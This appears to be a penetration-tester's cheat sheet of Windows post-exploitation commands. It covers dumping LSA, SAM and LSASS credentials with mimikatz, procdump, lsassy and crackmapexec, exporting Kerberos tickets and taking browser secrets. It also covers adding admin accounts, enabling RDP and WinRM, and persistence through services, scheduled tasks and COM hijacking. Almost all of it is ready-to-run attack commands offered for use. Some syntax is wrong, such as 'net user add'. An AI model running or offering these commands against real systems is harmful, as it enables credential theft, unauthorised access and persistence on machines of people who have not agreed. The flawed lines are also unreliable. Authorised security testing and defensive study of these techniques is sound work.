Skip to content

Post-Ex Windows

Dump secrets

LSA

crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa

SAM

crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam

reg save hklm\sam .\sam reg save hklm\system .\system reg save hklm\security .\security 
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL

LSASS

crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy

lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>

./spraykatz.py -u <user> -p <password> -t <ip>

pypykatz lsa minidump lsass.dmp

procdump.exe --accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt

.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit

Kerberos

.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit

Browser secrets

sharpchrome.exe

Create/add new local admin account

net user add <user> <pass>
net localgroup "Administrators" <user> /add

Enable WinRM

Enable-PSRemoting -SkipNetworkProfileCheck -Force

Enable RDP

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

add user to RDP group

net localgroup "Remote Desktop Users" <user> /add

Create service

New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic 
Start-Service syshell
or

sc \\127.0.0.1 create ServiceName binpath=C:\windows\system32\calc.exe

\192.168.1.2 is optional

To check if service working well, you can reboot like this:

wmic /node:192.168.1.2 os get buildnumber then

wmic /node:192.168.1.2 os where buildnumber="<Number>" call reboot

Execute binary using WMIC

wmic /node:127.0.0.1 process call create "C:\windows\system32\calc.exe"

/node is optional

Stop processus

Run this to get processid : sc \\127.0.0.1 query ServiceName

then : wmic /node:127.0.0.1 process where processid=<PID> call terminate

/node is optional

and then taskkill /S 127.0.0.1 /PID <PID> /f

/S is optional

Create Scheduled tasks

schtasks /create /S 192.156.1.2 /tn <name> /sc once /sd 01/01/1910 /ru system /tr “C:\windows\system32\calc.exe”

Other 

schtasks /create /S 127.0.0.1 /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30

ru , and /S is optional To check if tasks has been created run this schtasks /s 192.156.1.2 /query /tn <name>

COM hijack

schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg

# Change to HKCU and change dll
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"

Disconnect User

rwinsta /server:192.168.1.2 <sessionId>

to get sessionId please run this qwinsta